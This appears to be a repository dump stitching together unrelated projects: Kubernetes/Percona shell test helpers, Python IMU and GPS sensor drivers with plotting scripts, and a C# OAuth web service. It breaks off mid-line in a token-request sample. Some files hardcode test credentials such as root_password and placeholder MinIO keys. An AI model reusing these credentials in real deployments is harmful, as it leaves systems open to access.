pxc.percona.com/v.*\$#apiVersion: $API#" \ | $sed -e "s#image:.*-pxc\$#image: $IMAGE_PXC#" \ | $sed -e "s#image:.*-pmm\$#image: $IMAGE_PMM#" \ | $sed -e "s#image:.*-backup\$#image: $IMAGE_BACKUP#" \ | $sed -e "s#image:.*-proxysql\$#image: $IMAGE_PROXY#" } apply_config() { cat_config "$1" \ | kubectl_bin apply -f - } spinup_pxc() { local cluster=$1 local config=$2 local size="${3:-3}" local sleep="${4:-10}" desc 'create first PXC cluster' kubectl_bin apply \ -f $conf_dir/secrets.yml apply_config "$conf_dir/client.yml" apply_config "$config" desc 'check if all 3 Pods started' wait_for_running "$cluster-proxysql" 1 wait_for_running "$cluster-pxc" "$size" sleep $sleep desc 'write data' run_mysql \ 'CREATE DATABASE IF NOT EXISTS myApp; use myApp; CREATE TABLE IF NOT EXISTS myApp (id int PRIMARY KEY);' \ "-h $cluster-proxysql -uroot 
-proot_password" run_mysql \ 'INSERT myApp.myApp (id) VALUES (100500)' \ "-h $cluster-proxysql -uroot -proot_password" for i in $(seq 0 $(($size-1))); do compare_mysql_cmd "select-1" "SELECT * from myApp.myApp;" "-h $cluster-pxc-$i.$cluster-pxc -uroot -proot_password" done } kubectl_bin() { local LAST_OUT="$(mktemp)" local LAST_ERR="$(mktemp)" local exit_status=0 for i in $(seq 0 2); do kubectl "$@" 1>"$LAST_OUT" 2>"$LAST_ERR" exit_status=$? [[ ${-/x} != $- ]] && echo "--- $i stdout" | cat - "$LAST_OUT" >&$BASH_XTRACEFD [[ ${-/x} != $- ]] && echo "--- $i stderr" | cat - "$LAST_ERR" >&$BASH_XTRACEFD if [[ ${exit_status} != 0 ]]; then sleep "$((timeout * i))" else cat "$LAST_OUT" cat "$LAST_ERR" >&2 rm "$LAST_OUT" "$LAST_ERR" return ${exit_status} fi done cat "$LAST_OUT" cat "$LAST_ERR" >&2 rm "$LAST_OUT" "$LAST_ERR" return ${exit_status} } retry() { local max=$1 local delay=$2 shift 2 # cut delay and max args local n=1 until "$@"; do if [[ $n -ge $max ]]; then echo "The command '$@' has failed after $n attempts." exit 1 fi ((n++)) sleep $delay done } start_minio() { deploy_helm $namespace desc 'install Minio' helm del --purge minio-service || : retry 10 60 helm install \ $HELM_ARGS \ minio-service \ --set accessKey=some-access-key \ --set secretKey=some-secret-key \ --set service.type=ClusterIP \ --set configPath=/tmp/.minio/ \ --set persistence.size=2G \ --set environment.MINIO_REGION=us-east-1 \ --set environment.MINIO_HTTP_TRACE=/tmp/trace.log \ stable/minio MINIO_POD=$(kubectl_bin get pods --selector=release=minio-service -o 'jsonpath={.items[].metadata.name}') wait_pod $MINIO_POD kubectl_bin run -i --rm aws-cli --image=perconalab/awscli --restart=Never -- \ /usr/bin/env AWS_ACCESS_KEY_ID=some-access-key AWS_SECRET_ACCESS_KEY=some-secret-key AWS_DEFAULT_REGION=us-east-1 \ /usr/bin/aws --endpoint-url http://minio-service:9000 s3 mb s3://operator-testing }
1580b8fe1c86ac69b2bbabdf7a223c8ad9f9b837
[ "SQL", "Shell" ]
2
SQL
bitsbeats/percona-xtradb-cluster-operator
8493f540fc904238c2ffcd5dc8219926060a85b7
73b64f3f047180e3596e0cb192b024e2ff13f285
refs/heads/master
<file_sep>#!bin/bash IMU_Port=/dev/ttyUSB1 GPS_Port=/dev/ttyUSB0 export DISPLAY=:0 make make lcm-spy pushd ../lcm-spy/ ./runspy.sh & popd sudo gps_driver.py ${GPS_Port} & sudo imu_driver.py ${IMU_Port} & lcm-logger logs/imu_gps_log -i <file_sep>#!/usr/bin/env python # -*- coding: utf-8 -*- # for VectorNav IMU sensor import sys import lcm import time import serial import utm from exlcm import imu_message #import imu_message class IMU(object): def __init__(self, port_name): self.port = serial.Serial(port_name, 115200, timeout=1.) print 'Connected to:'+ self.port.portstr self.lcm = lcm.LCM("udpm://?ttl=1") self.packet = imu_message() print 'IMU: Initializing IMU' time.sleep(2) self.port.write('$VNTAR*5F\n') time.sleep(2) print 'Initialization complete, IMU tared' def readloop(self): while True: line = self.port.readline() while not line.startswith('$VNYMR'): line = self.port.readline() try: print(line) yawst, pitchst, rollst, magxst, magyst, magzst, accelxst, accelyst, accelzst, gyroxst, gyroyst, gyrozst = line.replace('$VNYMR','').strip().split('*')[0].split(',')[1:13] self.packet.yaw = float(yawst) self.packet.pitch = float(pitchst) self.packet.roll = float(rollst) self.packet.magx = float(magxst) self.packet.magy = float(magyst) self.packet.magz = float(magzst) self.packet.accelx = float(accelxst) self.packet.accely = float(accelyst) self.packet.accelz = float(accelzst) self.packet.gyrox = float(gyroxst) self.packet.gyroy = float(gyroyst) self.packet.gyroz = float(gyrozst) self.lcm.publish("IMU", self.packet.encode()) except: print("Data failed for some reason") # except: # print 'GPS ERROR (' + line + ')' if __name__ == "__main__": if len(sys.argv) != 2: print "Usage: %s <serial_port>\n" % sys.argv[0] sys.exit(0) myimu = IMU(sys.argv[1]) myimu.readloop() <file_sep>all: bash buildjar.sh ${TYPES_PATH} <file_sep>import sys import lcm import csv import matplotlib.pyplot as plt import numpy as np from scipy import integrate from exlcm import gps_message from exlcm 
import imu_message if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") imucount = 0 gpscount = 0 time = [] accx = [] accy = [] magy = [] magx = [] gyroz = [] for event in log: if event.channel == "GPS_Channel": # try: msg = gps_message.decode(event.data) imucount = imucount + 1 elif event.channel == "IMU": msg = imu_message.decode(event.data) #print(" timestamp = %s" % str(msg.timestamp)) #print(" yaw = %s" % str(msg.yaw)) #print(" pitch = %s" % str(msg.pitch)) #print(" roll = %s" % str(msg.roll)) #print(" magx = %s" % str(msg.magx)) #print(" magy = %s" % str(msg.magy)) #print(" magz = %s" % str(msg.magz)) #print(" accelx = %s" % str(msg.accelx)) #print(" accely = %s" % str(msg.accely)) #print(" accelz = %s" % str(msg.accelz)) #print(" gyrox = %s" % str(msg.gyrox)) #print(" gyroy = %s" % str(msg.gyroy)) #print(" gyroz = %s" % str(msg.gyroz)) time.append(msg.timestamp) accx.append(msg.accelx) accy.append(msg.accely) magy.append(msg.magy) magx.append(msg.magx) gyroz.append(msg.gyroz) gpscount = gpscount + 1 velocity = integrate.cumtrapz(accx, time,initial=0) #displacement = integrate.cumtrapz(velocity, time, initial = 0) nmagy = [] for num in magy: nmagy.append(num * -1) # get yaw data correctedyaw = np.arctan2(nmagy, magx) integratedyaw = integrate.cumtrapz(gyroz, time, initial = 0) # use low pass filter yaw = 0.98 * integratedyaw + 0.02*correctedyaw wx = correctedyaw * velocity comparison = yaw - wx #print(wx) #print(integratedyaw) plt.plot(magx, magy, 'ro') plt.show() <file_sep>#!/usr/bin/env python # -*- coding: utf-8 -*- # for USB GPS import sys import lcm import time import serial import utm from exlcm import gps_data class Gps(object): def __init__(self, port_name): self.port = serial.Serial(port_name, 4800, timeout=2.) 
# 9600-N-8-1 self.lcm = lcm.LCM() self.packet = gps_data() while True: print 'GPS: Initialization' line = self.port.readline() try: vals = line.split(",") except: vals = 0 if len(vals) == 0: time.sleep(0.2) self.port.flush() else: break def readloop(self): while True: line = self.port.readline() #try: vals = line.split(',') if vals[0] == "$GPGGA": self.packet.timestamp = int(vals[1]) self.packet.latitude = float(vals[2]) self.packet.lat_bearing = vals[3] self.packet.longitude = float(vals[4]) self.packet.long_bearing = vals[5] self.packet.altitude = float(vals[9]) if self.packet.lat_bearing == "S" : self.packet.latitude = -1 * self.packet.latitude if self.packet.long_bearing == "W" : self.packet.longitude = -1 * self.packet.longitude utm_coordinates = utm.from_latlon(self.packet.latitude/100, self.packet.longitude/100) self.packet.utm_X = float(utm_coordinates[0]) self.packet.utm_y = float(utm_coordinates[1]) print("timestamp: ", self.packet.timestamp) print("latitude: ", self.packet.latitude) #print("lat_bearing: ", self.packet.lat_bearing) print("longitude: ", self.packet.longitude) #print("long_bearing: ", self.packet.long_bearing) print("altitude: ", self.packet.altitude) print("gps_data: ", self.packet) #print("gps_data_encode: ", self.packet.encode()) print("utm_X", self.packet.utm_X) print("utm_y", self.packet.utm_y) self.lcm.publish("GPS", self.packet.encode()) else: line = 1 #except: #print 'ERROR (' + line + ')' if __name__ == "__main__": if len(sys.argv) != 2: print "Usage: %s <serial_port>\n" % sys.argv[0] sys.exit(0) mygps = Gps(sys.argv[1]) mygps.readloop() <file_sep>import sys import lcm import matplotlib.pyplot as plt from exlcm import gps_data if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") utm_x_list = [] utm_y_list = [] for event in log: if event.channel == "GPS": msg = gps_data.decode(event.data) utm_x_list.append(msg.utm_X) utm_y_list.append(msg.utm_y) 
plt.plot(utm_x_list,utm_y_list,'ro') plt.axis([min(utm_x_list),max(utm_x_list),min(utm_y_list),max(utm_y_list)]) plt.show() <file_sep>import sys import lcm import math import csv import matplotlib.pyplot as plt import numpy as np from scipy import integrate from scipy import optimize from exlcm import gps_message from exlcm import imu_message if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") imucount = 0 gpscount = 0 time = [] accx = [] accy = [] magy = [] magx = [] yaw = [] easting = [] northing = [] gyroz = [] for event in log: if event.channel == "GPS_Channel": # try: msg = gps_message.decode(event.data) imucount = imucount + 1 easting.append(msg.easting) northing.append(msg.northing) elif event.channel == "IMU": msg = imu_message.decode(event.data) #print(" timestamp = %s" % str(msg.timestamp)) #print(" yaw = %s" % str(msg.yaw)) #print(" pitch = %s" % str(msg.pitch)) #print(" roll = %s" % str(msg.roll)) #print(" magx = %s" % str(msg.magx)) #print(" magy = %s" % str(msg.magy)) #print(" magz = %s" % str(msg.magz)) #print(" accelx = %s" % str(msg.accelx)) #print(" accely = %s" % str(msg.accely)) #print(" accelz = %s" % str(msg.accelz)) #print(" gyrox = %s" % str(msg.gyrox)) #print(" gyroy = %s" % str(msg.gyroy)) #print(" gyroz = %s" % str(msg.gyroz)) time.append(event.timestamp) accx.append(msg.accelx) accy.append(msg.accely) magy.append(msg.magy) magx.append(msg.magx) gyroz.append(msg.gyroz) yaw.append(msg.yaw) gpscount = gpscount + 1 oyaw = yaw basetime = min(time) realtime = [] for times in time: realtime.append(times -basetime) time = realtime velocity = integrate.cumtrapz(accx, time,initial=0) #displacement = integrate.cumtrapz(velocity, time, initial = 0) nmagy = [] for num in magy: nmagy.append(num * -1.0) # get yaw data correctedyaw = np.arctan2(nmagy, magx) heading = correctedyaw integratedyaw = integrate.cumtrapz(gyroz, time, initial = 0) print("max nmagy: " + str(max(nmagy))) 
print("min nmagy: " + str(min(nmagy))) print("max magy: " + str(max(magy))) print("mix magy: " + str(min(magy))) print("max heading: " + str(max(heading))) print("mix heading: " + str(min(heading))) # use low pass filter yaw = 0.98 * integratedyaw + 0.02*correctedyaw wx = correctedyaw * velocity # gyro z times x velocity xvel = integrate.cumtrapz(accx, time, initial = 0) gzxv = (gyroz * xvel)/10000000 #print(integratedyaw) modx = [] mody = [] for m in magx: #modx.append(m-.005) el = m-.005 ma = math.cos(-0.7) #+ math.sin(-0.7) fi = el * ma #print(fi) #fi = math.sqrt(fi) modx.append(fi) for m in magy: #mody.append(m-.255) el = m-.255 ma = 1#(-1 * math.sin(-0.7) + math.cos(-0.7)) fi = el * ma #fi - math.sqrt(fi) mody.append(fi) fig = plt.figure() gr = fig.add_subplot(111) #Pre-Calibration mag #gr.plot(magx, magy, 'ro') #gr.set_title('Pre-Calibration') #gr.set_xlabel('MagX') #gr.set_ylabel('MagY') #Post-Calibration mag #gr.plot(modx, mody, 'ro') #plt.xlim(min(modx),max(modx)) #plt.ylim(min(mody),max(mody)) #gr.set_title('Post-Calibration') #gr.set_xlabel('MagX') #gr.set_ylabel('MagY') #GPS Route #gr.plot(easting, northing, 'ro') #gr.set_title('GPS Route') #gr.set_xlabel('Easting') #gr.set_ylabel('Northing') #Yaw from IMU #gr.plot(time, yaw, color = "r") #gr.set_title('IMU Yaw') #gr.set_xlabel('Time') #gr.set_ylabel('Yaw') #Yaw from IMU VS Calculated #gr.plot(time, yaw, color = "r") #gr.plot(time, integratedyaw, color = "b") #gr.set_title('IMU Yaw vs Calculated Yaw') #gr.set_xlabel('Time') #gr.set_ylabel('Yaw') # Problem 1: compare y acceleration vs gyroz times x velocity gr.plot(time, gzxv, color = "r") gr.plot(time, accy, color = "b") gr.set_title('Y Acc Vs. 
GyroZ*X Velocity') gr.set_xlabel('Time') gr.set_ylabel('Acceleration') # Problem 2: ev = [] nv = [] xvel = integrate.cumtrapz(accx, time, initial = 0) noyaw = [] for v in oyaw: noyaw.append(-1*v) for v,head in zip(xvel,noyaw): ev.append(v*math.cos(math.radians(head))) nv.append(v*math.sin(math.radians(head))) xcoord = [] ycoord = [] x = 0 y = 0 edis = integrate.cumtrapz(ev, time, initial = 0) ndis = integrate.cumtrapz(nv, time, initial = 0) edis2 = [] ndis2 = [] for e,n in zip(edis,ndis): e = (e*math.cos(-.5104))-(n*math.sin(-.5104)) n = (n*math.cos(-.5104))+(e*math.sin(-.5104)) e = e/(.0786/.0415) edis2.append(e) ndis2.append(n) #gr.plot(edis2, ndis2, color = "r") #gr.set_title('IMU Path') #gr.set_xlabel('Easting') #gr.set_ylabel('Northing') plt.show() <file_sep>import sys import lcm from exlcm import gps_message from exlcm import imu_message if len(sys.argv) < 2: sys.stderr.write("usage: read-log <logfile>\n") sys.exit(1) log = lcm.EventLog(sys.argv[1], "r") imucount = 0 gpscount = 0 for event in log: # print(event.channel) if event.channel == "GPS_Channel": print(event.channel) try: msg = gps_message.decode(event.data) print("Message:") print(" timestamp = %s" % str(msg.timestamp)) print(" gpstime = %s" % str(msg.gpstime)) print(" latitude = %s" % str(msg.latitude)) print(" longitude = %s" % str(msg.longitude)) print(" altitude = %s" % str(msg.altitude)) print(" easting = %s" % str(msg.easting)) print(" northing = %s" % str(msg.northing)) imucount = imucount + 1 print("") except: print("Did not work") elif event.channel == "IMU": print(event.channel) msg = imu_message.decode(event.data) print("Message:") print(" timestamp = %s" % str(msg.timestamp)) print(" yaw = %s" % str(msg.yaw)) print(" pitch = %s" % str(msg.pitch)) print(" roll = %s" % str(msg.roll)) print(" magx = %s" % str(msg.magx)) print(" magy = %s" % str(msg.magy)) print(" magz = %s" % str(msg.magz)) print(" accelx = %s" % str(msg.accelx)) print(" accely = %s" % str(msg.accely)) print(" accelz = %s" % 
str(msg.accelz)) print(" gyrox = %s" % str(msg.gyrox)) print(" gyroy = %s" % str(msg.gyroy)) print(" gyroz = %s" % str(msg.gyroz)) gpscount = gpscount + 1 print("Total imu points: " + str(imucount)) print("Total gps points: " + str(gpscount))
65475535cb1fad67d2e9df43edca6dd252c31512
[ "Python", "Makefile", "Shell" ]
8
Shell
omcnicoll/Robotics-Sensing-Navigation
a4404d26c869ba5abde9cce0e275a3cbb2435e28
1d4c24a217fecf14fc946cc93263c56ac7a0f50a
refs/heads/master
<file_sep>using System.Web.Mvc; namespace PCG.GOAL.WebService.Controllers { [Authorize(Roles = "Admin")] public class AdminController : Controller { // GET: Admin public ActionResult Index() { var baseUrl = string.Format("{0}://{1}", Request.Url.Scheme, Request.Url.Authority); var token = DbConfig.GetInternalToken(baseUrl); ViewBag.Token = token; return View(); } } }<file_sep>using System; using Microsoft.AspNet.Identity; using Microsoft.Owin; using Microsoft.Owin.Security.Cookies; using Microsoft.Owin.Security.OAuth; using Owin; using PCG.GOAL.WebService; using PCG.GOAL.WebService.Security; [assembly: OwinStartup(typeof(Startup))] namespace PCG.GOAL.WebService { public class Startup { public static OAuthAuthorizationServerOptions OAuthOptions { get; private set; } public static string PublicClientId { get; private set; } public void Configuration(IAppBuilder app) { OAuthOptions = new OAuthAuthorizationServerOptions { TokenEndpointPath = new PathString("/Token"), Provider = new GoalOAuthProvider(), RefreshTokenProvider = new GoalRefreshTokenProvider(), AccessTokenExpireTimeSpan = TimeSpan.FromDays(1), AllowInsecureHttp = true }; // Enable the application to use bearer tokens to authenticate users app.UseOAuthBearerTokens(OAuthOptions); app.UseCookieAuthentication(new CookieAuthenticationOptions { AuthenticationType = DefaultAuthenticationTypes.ApplicationCookie, LoginPath = new PathString("/Authentication/Login"), CookieHttpOnly = false, }); } } } <file_sep>using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.Common.Interface { public interface IOAuthValidator { bool ValidateClient(string clientId, string clientSecret); Credentials ValidateUser(string username, string password); bool VerifyHashedPassword(string hashedPassword, string password); } } <file_sep>using System; using System.Collections.Generic; using 
Microsoft.VisualStudio.TestTools.UnitTesting; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.WebService.Test.WebClient { /* * This TestClass will run the tests against the web servce published to http://goalservice.azurewebsites.net, * which therefor retrieves data from service in https://stage-rethinkapi.azurewebsites.net/api/children * with apikey=f6c869277d6b4eaeb9408e90d91ce0a6. * if those services are not available, or just don't want to run this Test Class, * please comment out all the test methods below */ [TestClass] public class WebClientTest { const string BaseUrl = "http://goalservice.azurewebsites.net"; const string TokenEndpoint = "/token"; const string EndpointAllStudents = "/api/rethink/Student"; const string EndpointStudentByIdentity = "/api/rethink/StudentByIdentity?firstname=Brooklin&lastname=Altis&dob=20080605"; const string EndpointStudentByStatetestnumber = "/api/rethink/StudentByStatetestnumber?statetestnumber=2724167171"; private Token _token; private WebClientSampleCode _webClientSampleCode; [TestInitialize] public void TestInitilaize() { _webClientSampleCode=new WebClientSampleCode(BaseUrl,TokenEndpoint, EndpointAllStudents,EndpointStudentByIdentity,EndpointStudentByStatetestnumber); _token = _webClientSampleCode.GetToken(); } [TestMethod] public void CanGetStudentByIdentity() { return; try { var responseData = _webClientSampleCode.GetStudentByIdentity(_token); Assert.IsNotNull(responseData); Assert.IsTrue(responseData.Done); Assert.IsInstanceOfType(responseData.Data, typeof(IEnumerable<ChildInfo>)); } catch (Exception ex) { Assert.IsNull(ex); } } [TestMethod] public void CanGetStudentByStatetestnumber() { return; try { var responseData = _webClientSampleCode.GetStudentByStatetestnumber(_token); Assert.IsNotNull(responseData); Assert.IsTrue(responseData.Done); Assert.IsInstanceOfType(responseData.Data, typeof(IEnumerable<ChildInfo>)); Assert.IsTrue(responseData.Data.Count == 1); } catch (Exception ex) { 
Assert.IsNull(ex); } } [TestMethod] public void CanGetAllStudents() { return; try { var responseData = _webClientSampleCode.GetAllStudents(_token); Assert.IsNotNull(responseData); Assert.IsTrue(responseData.Done); Assert.IsInstanceOfType(responseData.Data, typeof(IEnumerable<ChildInfo>)); } catch (Exception ex) { Assert.IsNull(ex); } } [TestMethod] public void CanGetToken() { try { var token = _webClientSampleCode.GetToken(); Assert.IsNotNull(token); Assert.IsInstanceOfType(token, typeof(Token)); } catch (Exception ex) { Assert.IsNull(ex); } } [TestMethod] public void CanRefreshToken() { try { var token = _webClientSampleCode.RefreshToken(); Assert.IsNotNull(token); Assert.IsInstanceOfType(token, typeof(Token)); } catch (Exception ex) { Assert.IsNull(ex); } } } } <file_sep>using System; using System.Collections.Generic; using System.Security.Claims; using System.Threading.Tasks; using Microsoft.Owin.Security; using Microsoft.Owin.Security.OAuth; using Ninject; using PCG.GOAL.Common.Interface; namespace PCG.GOAL.WebService.Security { public class GoalOAuthProvider : OAuthAuthorizationServerProvider { [Inject] public IOAuthValidator Validator { get; set; } public GoalOAuthProvider() { Validator = WebApiApplication.Kernel.Get<IOAuthValidator>(); } public override async Task ValidateClientAuthentication(OAuthValidateClientAuthenticationContext context) { try { string clientId, clientSecret; if (context.TryGetBasicCredentials(out clientId, out clientSecret) || context.TryGetFormCredentials(out clientId, out clientSecret)) { if (Validator.ValidateClient(clientId, clientSecret)) { context.Validated(); } } else { context.SetError("Invalid credentials"); context.Rejected(); } } catch (Exception e) { context.SetError("Server error"); context.Rejected(); } } public override async Task GrantResourceOwnerCredentials(OAuthGrantResourceOwnerCredentialsContext context) { var credentials = Validator.ValidateUser(context.UserName, context.Password); if (credentials == null) { 
context.Rejected(); return; } // create identity var id = new ClaimsIdentity(context.Options.AuthenticationType); id.AddClaim(new Claim("sub", context.UserName)); id.AddClaim(new Claim(ClaimTypes.Name, context.UserName)); id.AddClaim(new Claim(ClaimTypes.Role,credentials.Role)); // create metadata to pass on to refresh token provider var props = new AuthenticationProperties(new Dictionary<string, string> { {"oauth:client_id", context.ClientId} }); var ticket = new AuthenticationTicket(id, props); context.Validated(ticket); } public override async Task GrantRefreshToken(OAuthGrantRefreshTokenContext context) { var originalClient = context.Ticket.Properties.Dictionary["oauth:client_id"]; var currentClient = context.ClientId; // enforce client binding of refresh token if (originalClient != currentClient) { context.Rejected(); return; } // chance to change authentication ticket for refresh token requests var newId = new ClaimsIdentity(context.Ticket.Identity); newId.AddClaim(new Claim("newClaim", "refreshToken")); var newTicket = new AuthenticationTicket(newId, context.Ticket.Properties); context.Validated(newTicket); } } } <file_sep>using System; using System.Collections.Generic; using System.Net.Http; using System.Threading.Tasks; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.ExternalDataService.Interface { public interface IWebServiceClient<T> where T : class { Credentials Credentials { get; set; } string BaseUri { get; set; } string TokenEndpoint { get; set; } string ServiceEndpoint { get; set; } Func<Credentials> SetCredentials { get; set; } bool IsSingleResult { get; set; } IClient HttpClient { get; set; } IContent ResponseContent { get; set; } string GetToken(); Task<ResponseData<T>> GetAsync(string token = null); Task<ResponseData<T>> PostAsync(IEnumerable<T> records, string token = null); Task<ResponseData<T>> PutAsync(IEnumerable<T> records, string token = null); Task<ResponseData<T>> DeleteAsync(IEnumerable<T> records, string token = null); } 
}<file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.Models { public class BehaviorInfo { public string Name { get; set; } public string Description; public string DataCollectionMethod { get; set; } public string IepGoal { get; set; } public List<BehaviorObjective> BehaviorObjectives { get; set; } } }<file_sep>/* * usage: * dialogService.confirmModal('Confirm','Are you sure?',function_Ok); * * */ (function () { angular.module("webServices").factory('dialogService', ['$modal', rainConfirm]); function rainConfirm($modal) { return { confirmModal: confirmModal, messageModal: messageModal }; // confirmModal function confirmModal(title, message, funcOk) { title = title || 'Confirm'; message = message || 'Are you sure?'; var modalInstance = $modal.open({ //templateUrl: 'deleteUserModal.html', //size:'sm', template: getConfirmTemplate(title, message), controller: function ($scope, $modalInstance) { $scope.ok = function () { if (funcOk && angular.isFunction(funcOk)) { funcOk(); //return; } $modalInstance.close(true); }; $scope.cancel = function () { $modalInstance.close(false); }; } }); return modalInstance.result; } function getConfirmTemplate(title, message) { return '<div class="modal-header">' + '<h3 class="modal-title">' + title + '</h3>' + '</div>' + '<div class="modal-body">' + '<p style="font-size: 16px;">' + message + '</p>' + '</div>' + '<div class="modal-footer">' + '<button class="btn btn-primary" ng-click="ok()">Yes</button>' + '<button class="btn btn-warning" ng-click="cancel()">No</button>' + '</div>'; } // messageModal function messageModal(title, markup, funcOk) { title = title || 'Information'; markup = markup || '<p></p>'; var modalInstance = $modal.open({ //size:'sm', template: getMessageTemplate(title, markup), controller: function ($scope, $modalInstance) { $scope.ok = function () { if (funcOk && angular.isFunction(funcOk)) { funcOk(); //return; } $modalInstance.close(true); }; } }); return modalInstance.result; } function 
getMessageTemplate(title, markup) { return '<div class="modal-header">' + '<h3 class="modal-title">' + title + '</h3>' + '</div>' + '<div class="modal-body">' + markup + '</div>' + '<div class="modal-footer">' + '<button class="btn btn-primary" ng-click="ok()">Close</button>' + '</div>'; } } })();<file_sep>using System.Data; using System.Linq; using Microsoft.VisualStudio.TestTools.UnitTesting; using Moq; using PCG.GOAL.Common.DataAccess; using PCG.GOAL.Common.Interface; namespace PCG.GOAL.WebService.Test.DataAccess { [TestClass()] public class DbServiceTests { private Mock<ISqlDataAccess> _sqlDataAccessMock; private IDbService _dbService; [TestInitialize] public void TestInitialize() { _sqlDataAccessMock = new Mock<ISqlDataAccess>(); _dbService = new DbService(_sqlDataAccessMock.Object); } [TestMethod()] public void GetAllCredentialsTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetCredentialsTable()); var all = _dbService.GetAllCredentials(); Assert.IsNotNull(all); Assert.AreEqual(2, all.ToList().Count); } [TestMethod()] public void GetCredentialsTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetCredentialsTable()); var result = _dbService.GetCredentials("userAdmin"); Assert.IsNotNull(result); Assert.AreEqual("<PASSWORD>", result.Password); } [TestMethod()] public void GetCredentialsByIdTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetCredentialsTable()); var result = _dbService.GetCredentialsById(1); Assert.IsNotNull(result); Assert.AreEqual("<PASSWORD>", result.Password); } [TestMethod()] public void GetAllClientInfoTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetClientTable); var all = _dbService.GetAllClientInfo(); Assert.IsNotNull(all); Assert.AreEqual(2, all.ToList().Count); } [TestMethod()] public void GetClientInfoTest() { 
_sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetClientTable); var result = _dbService.GetClientInfo("client_1"); Assert.IsNotNull(result); Assert.AreEqual("secret_1", result.ClientSecret); } [TestMethod()] public void GetClientInfoByIdTest() { _sqlDataAccessMock.Setup(x => x.GetTableBySql(It.IsAny<string>(), It.IsAny<bool>())).Returns(GetClientTable); var result = _dbService.GetClientInfoById(1); Assert.IsNotNull(result); Assert.AreEqual("secret_1", result.ClientSecret); } private static DataTable GetCredentialsTable() { var table = new DataTable(); table.Columns.Add("id", typeof(int)); table.Columns.Add("username", typeof(string)); table.Columns.Add("password", typeof(string)); table.Columns.Add("role", typeof(string)); table.Rows.Add(1, "userAdmin", "passAdmin", "roleAdmin"); table.Rows.Add(2, "userFoo", "passFoo", "roleFoo"); return table; } private static DataTable GetClientTable() { var table = new DataTable(); table.Columns.Add("id", typeof(int)); table.Columns.Add("clientid", typeof(string)); table.Columns.Add("clientsecret", typeof(string)); table.Columns.Add("description", typeof(string)); table.Rows.Add(1, "client_1", "secret_1", "description1"); table.Rows.Add(2, "client_2", "secret_2", "description2"); return table; } } } <file_sep>$(function () { $("#btnLogin").on('click', login); function login(e) { if ($('#txtUsername').val() === '' || $('#txtPassword').val() === '') { toastr.warning("Please enter username and password"); e.preventDefault(); return; } $('#formLogin').attr('action', "Login").attr('method', 'post').submit(); //$.post('/Authentication/Login/', $('#formLogin').serialize()); } var loginFailed = $('#loginFailed').val(); if (loginFailed && loginFailed.length > 0) { toastr.warning("Invalid username or password"); } });<file_sep>namespace PCG.GOAL.Common.WebModels { public interface IServiceConfig { string BaseUrl { get; set; } string ServiceEndpoint { get; set; } string TokenEndpoint { get; 
set; } string ApiKey { get; set; } } public class ServiceConfig : IServiceConfig { public string BaseUrl { get; set; } public string ServiceEndpoint { get; set; } public string TokenEndpoint { get; set; } public string ApiKey { get; set; } } } <file_sep>namespace PCG.GOAL.Common.Models { public class BehaviorMasteryCriteria { public string LocationTime { get; set; } public string Change { get; set; } public string Target { get; set; } public string TargetUnit { get; set; } } }<file_sep>using System.Collections.Generic; namespace PCG.GOAL.Common.Models { public class LessonInfo { public string LessonName { get; set; } public string LessonCategory { get; set; } public string IsCore { get; set; } public string LessonSubCategory { get; set; } public int IepGoalId { get; set; } public string IepGoal { get; set; } public bool InCurrentPlan { get; set; } public string CommonStandard { get; set; } public string CommonStandardDescription { get; set; } public string CommonStandardRationale { get; set; } public List<LessonObjective> LessonObjectives { get; set; } } }<file_sep>using System; using System.Collections.Specialized; using System.Net; using System.Text; using Newtonsoft.Json; using PCG.GOAL.Common.Models; using PCG.GOAL.Common.WebModels; namespace PCG.GOAL.WebService.Test.WebClient { public class WebClientSampleCode { #region fields and properties private const string TokenType = "Bearer"; private readonly string _baseUrl; private readonly string _endpointToken; private readonly string _endpointAllStudents; private readonly string _endpointStudentByIdentity; private readonly string _endpointStudentByStatetestnumber; private readonly Credentials _credentials; private Uri TokenUrl {get { return GetUri(_baseUrl, _endpointToken); }} #endregion #region Constructor public WebClientSampleCode(string baseUrl, string endpointToken, string endpointAllStudents, string endpointStudentByIdentity, string endpointStudentByStatetestnumber) { _baseUrl = baseUrl; _endpointToken = 
endpointToken; _endpointAllStudents = endpointAllStudents; _endpointStudentByIdentity = endpointStudentByIdentity; _endpointStudentByStatetestnumber = endpointStudentByStatetestnumber; var oauthAccess = new OAuthAccess(); _credentials = oauthAccess.GetCredentials(); } #endregion #region public methods public ResponseData<ChildInfo> GetAllStudents(Token token) { return GetStudentsByEndpoint(GetUri(_baseUrl, _endpointAllStudents),token); } public ResponseData<ChildInfo> GetStudentByIdentity(Token token) { return GetStudentsByEndpoint(GetUri(_baseUrl, _endpointStudentByIdentity), token); } public ResponseData<ChildInfo> GetStudentByStatetestnumber(Token token) { return GetStudentsByEndpoint(GetUri(_baseUrl, _endpointStudentByStatetestnumber), token); } public Token GetToken() { // web client var client = new System.Net.WebClient(); // invoke the REST method client.Headers.Add("Content-Type", "application/x-www-form-urlencoded"); string credentials = Convert.ToBase64String( Encoding.ASCII.GetBytes(string.Format("{0}:{1}", _credentials.ClientId, _credentials.ClientSecret))); client.Headers[HttpRequestHeader.Authorization] = string.Format("Basic {0}", credentials); var postVaules = new NameValueCollection { {"username",_credentials.Username}, {"password", _<PASSWORD>}, {"grant_type", GrantTpype.Password} }; try { byte[] result = client.UploadValues(TokenUrl, "POST", postVaules); var jsonData = 